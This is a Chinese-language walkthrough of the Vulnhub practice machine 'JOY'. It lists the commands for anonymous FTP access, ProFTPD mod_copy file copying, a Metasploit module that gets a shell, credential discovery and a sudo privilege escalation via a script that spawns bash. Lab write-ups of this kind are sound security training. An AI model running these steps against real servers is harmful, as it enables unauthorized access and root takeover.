Digitalworld.local: JOY Vulnhub靶场题解

前期准备

镜像下载

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

环境配置:

在VM以net连接打开虚拟机

使用的机器:

攻击机:kali linux,ubuntu
靶机:ip随配(192.168.119.137)

渗透开始

1.nmap发现主机,并扫描其ip信息

nmap -A 192.168.119.137
Digitalworld.local: JOY Vulnhub靶场题解_第1张图片

2.发现ftp相关的知识,尝试登陆ftp

ftp 192.168.119.137
账号:anonymous
密码:空
ls
cd download
ls
cd ..
cd upload
ls
get directory

Digitalworld.local: JOY Vulnhub靶场题解_第2张图片
退出ftp

cat directory
Digitalworld.local: JOY Vulnhub靶场题解_第3张图片
由于version_control存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中

telnet 192.168.119.137 21
site cpfr /home/patrick/version_control
site cpto /home/upload/version_control

Digitalworld.local: JOY Vulnhub靶场题解_第4张图片

3.下载相关文件,发现版本漏洞

访问路径 ftp://192.168.119.137/upload/version_control
直接下载一个文件,打开
Digitalworld.local: JOY Vulnhub靶场题解_第5张图片

由上 proftpd的版本是存在漏洞的,并且告诉了webroot路径,可以使用msf里面的脚本攻击

4.使用msf获得shell,并尝试提权

use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.119.137
set sitepath /var/www/tryingharderisjoy

Digitalworld.local: JOY Vulnhub靶场题解_第6张图片
python -c 'import pty; pty.spawn("/bin/bash")'

ls 
cd ossec
ls
cat patricksecretsofjoy

发现账户以及密码
Digitalworld.local: JOY Vulnhub靶场题解_第7张图片

5.得到另一个账号,尝试提权

切换账户登陆
su -l patrick
Digitalworld.local: JOY Vulnhub靶场题解_第8张图片

6.将提权的脚本写入对应的路径中

可以看到在路径 /home//patrick/script/test 是免密的
那我们可以尝试上传脚本文件到此路径中
本地主机编写脚本
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
使用ftp上传到upload

cd upload
put test

Digitalworld.local: JOY Vulnhub靶场题解_第9张图片
在使用telnet转换一下路径

site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test

Digitalworld.local: JOY Vulnhub靶场题解_第10张图片

7.提权

sudo /home/patrick/script/test
cd /root
cat proof.txt
author-secret.txt

Digitalworld.local: JOY Vulnhub靶场题解_第11张图片

你可能感兴趣的:(渗透靶机学习)